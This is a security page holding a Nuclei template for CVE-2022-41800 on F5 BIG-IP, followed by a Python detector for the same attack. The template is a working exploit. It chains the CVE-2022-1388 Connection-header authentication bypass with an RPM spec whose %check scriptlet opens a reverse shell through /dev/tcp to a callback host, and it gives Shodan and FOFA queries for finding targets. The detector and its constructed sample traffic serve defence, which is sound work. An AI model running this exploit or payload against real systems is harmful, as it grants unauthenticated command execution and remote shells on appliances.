Vulnerability description
When running in Appliance mode, an authenticated user assigned the Administrator role may bypass Appliance mode restrictions by using an undisclosed iControl REST endpoint. The Nuclei template below reaches that endpoint without valid credentials by chaining the iControl REST authentication bypass (CVE-2022-1388, the `Connection: ... X-F5-Auth-Token` header trick) with an RPM spec whose `%check` scriptlet is executed when the package is built.
id: CVE-2022-41800

info:
  name: F5 BIG-IP Appliance Mode - Command Injection
  author: dwisiswant0
  severity: high
  description: |
    When running in Appliance mode, an authenticated user assigned the Administrator role may bypass Appliance mode restrictions by using an undisclosed iControl REST endpoint.
  impact: |
    A successful exploit allows the attacker to execute arbitrary commands on the appliance. This template chains the iControl REST authentication bypass (CVE-2022-1388) to reach the endpoint without valid credentials.
  reference:
    - https://attackerkb.com/topics/ZClTQn4aG4/cve-2022-41800/rapid7-analysis
    - https://support.f5.com/csp/article/K97843387
    - https://support.f5.com/csp/article/K13325942
    - https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
    - https://nvd.nist.gov/vuln/detail/cve-2022-41800
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
    cvss-score: 8.7
    cve-id: CVE-2022-41800
    cwe-id: CWE-77
    epss-score: 0.92837
    epss-percentile: 0.99755
    cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: f5
    product: big-ip_access_policy_manager
    shodan-query:
      - http.title:"big-ip®-+redirect" +"server"
      - http.html:"big-ip apm"
    fofa-query:
      - body="big-ip apm"
      - title="big-ip®-+redirect" +"server"
    google-query: intitle:"big-ip®-+redirect" +"server"
  tags: cve,cve2022,rce,f5,bigip,intrusive

variables:
  auth: "admin:{{rand_text_alpha(1)}}"
  rand_app: "{{to_lower(rand_text_alpha(6))}}"
  rand_ver: "{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}"
  rand_rel: "{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}"

http:
  - raw:
      # Step 1: create an RPM spec whose %check scriptlet carries the payload.
      # The X-F5-Auth-Token / Connection header pair is the CVE-2022-1388 bypass,
      # so the Basic credentials do not need to be valid.
      - |
        POST /mgmt/shared/iapp/rpm-spec-creator HTTP/1.1
        Host: {{Hostname}}
        X-F5-Auth-Token: {{to_lower(rand_text_alpha(1))}}
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json
        Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host

        {
          "specFileData": {
            "name": "{{rand_app}}",
            "srcBasePath": "/tmp",
            "version": "{{rand_ver}}",
            "release": "{{rand_rel}}",
            "description": "\n\n%check\nbash -i >& /dev/tcp/{{interactsh-url}}/{{rand_text_numeric(4)}} 0>&1",
            "summary": "{{to_lower(rand_text_alphanumeric(10))}}"
          }
        }

      # Step 2: build the package from the spec path returned by step 1;
      # rpmbuild runs the %check scriptlet during the build.
      - |
        POST /mgmt/shared/iapp/build-package HTTP/1.1
        Host: {{Hostname}}
        X-F5-Auth-Token: {{to_lower(rand_text_alpha(1))}}
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json
        Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host

        {
          "state": {},
          "appName": "{{rand_app}}",
          "packageDirectory": "/tmp",
          "specFilePath": "{{spec}}",
          "force": true
        }

    extractors:
      - type: json
        part: body
        name: spec
        json:
          - ".specFilePath"
        internal: true

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - "RUN_BUILD_RPM_TASK"
          - "shared:iapp:build-package:buildrpmtaskstate"
# digest: 4b0a00483046022100c297bfec6bc826beca8496e8d14f09815dc2697ecf2b1bee2ef5e8e190a29cfb022100ae1f38f0eecae3364faff7c31faf59272247fcf8cb30ad3dabf61243199ddffb:922c64590222798bb761d5b6d8e72950
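The template above exposes three indicators a defender can key on: a request to the `/mgmt/shared/iapp/rpm-spec-creator` or `/mgmt/shared/iapp/build-package` endpoint, a `Connection` header that names `X-F5-Auth-Token` (the CVE-2022-1388 bypass), and a spec field carrying an RPM scriptlet section such as `%check`. The following is an added example, not part of the Nuclei template or of any F5 tooling: a small Python detector that parses raw HTTP requests (the sample requests and hostnames are constructed for the demo) and flags those indicators. The scriptlet list goes slightly beyond the page, covering the other RPM sections (`%pre`, `%post`, `%build`, ...) that rpmbuild would also execute.

```python
"""Flag CVE-2022-41800 / CVE-2022-1388 exploitation attempts in raw HTTP requests.

Added example, not code from the Nuclei template above. Sample requests below
are constructed for the demo; hostnames and credentials are placeholders.
"""
import json
import re

# Endpoints used by the template (step 1 creates the spec, step 2 builds it).
IAPP_PATHS = (
    "/mgmt/shared/iapp/rpm-spec-creator",
    "/mgmt/shared/iapp/build-package",
)

# RPM scriptlet sections that rpmbuild executes; %check is the one the
# template injects, the others are the same class of sink.
SCRIPTLET_RE = re.compile(r"^%(check|prep|build|install|pre|post|preun|postun)\b", re.M)


def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    text = raw.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target.split("?", 1)[0], headers, body


def scriptlets_in_spec(body):
    """Return (field, section) pairs for RPM scriptlets found in specFileData."""
    try:
        data = json.loads(body) if body.strip() else {}
    except ValueError:
        return []
    spec = data.get("specFileData", {}) if isinstance(data, dict) else {}
    found = []
    for field, value in spec.items():
        if isinstance(value, str):
            for m in SCRIPTLET_RE.finditer(value):
                found.append((field, m.group(0)))
    return found


def assess(raw):
    """Return the list of indicators present in one raw request, in fixed order."""
    _method, path, headers, body = parse_request(raw)
    findings = []
    if path in IAPP_PATHS:
        findings.append("iapp-endpoint")
    # CVE-2022-1388: listing X-F5-Auth-Token in Connection makes the front-end
    # strip it before the back-end sees the request, so the token is never checked.
    conn_tokens = {t.strip().lower() for t in headers.get("connection", "").split(",")}
    if "x-f5-auth-token" in conn_tokens:
        findings.append("cve-2022-1388-connection-bypass")
    if scriptlets_in_spec(body):
        findings.append("rpm-scriptlet-in-spec")
    return findings


def verdict(raw):
    """Collapse indicators into exploit-attempt / suspicious / benign."""
    findings = assess(raw)
    if "rpm-scriptlet-in-spec" in findings or (
        "iapp-endpoint" in findings and "cve-2022-1388-connection-bypass" in findings
    ):
        return "exploit-attempt"
    return "suspicious" if findings else "benign"


# --- constructed sample traffic (not captured from a real device) ---
_SPEC_BODY = json.dumps({"specFileData": {
    "name": "abcdef", "srcBasePath": "/tmp", "version": "1.2.3", "release": "4.5.6",
    "description": "\n\n%check\nid > /tmp/marker", "summary": "x"}})
SPEC_REQUEST = (
    "POST /mgmt/shared/iapp/rpm-spec-creator HTTP/1.1\r\n"
    "Host: bigip.example.test\r\nX-F5-Auth-Token: a\r\n"
    "Authorization: Basic YWRtaW46eA==\r\nContent-Type: application/json\r\n"
    "Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host\r\n\r\n" + _SPEC_BODY
)
BUILD_REQUEST = (
    "POST /mgmt/shared/iapp/build-package HTTP/1.1\r\n"
    "Host: bigip.example.test\r\nX-F5-Auth-Token: a\r\n"
    "Authorization: Basic YWRtaW46eA==\r\nContent-Type: application/json\r\n"
    "Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host\r\n\r\n"
    + json.dumps({"state": {}, "appName": "abcdef", "packageDirectory": "/tmp",
                  "specFilePath": "/tmp/abcdef.spec", "force": True})
)
BENIGN_REQUEST = (
    "GET /mgmt/tm/sys/version HTTP/1.1\r\nHost: bigip.example.test\r\n"
    "Authorization: Basic YWRtaW46eA==\r\nConnection: keep-alive\r\n\r\n"
)

if __name__ == "__main__":
    for name, req in (("spec", SPEC_REQUEST), ("build", BUILD_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, verdict(req), assess(req))
```

A legitimate iApp package build from the GUI also hits `build-package`, so the endpoint alone is only "suspicious"; the `Connection` header listing `X-F5-Auth-Token` or a scriptlet in the spec is what raises it to an exploit attempt.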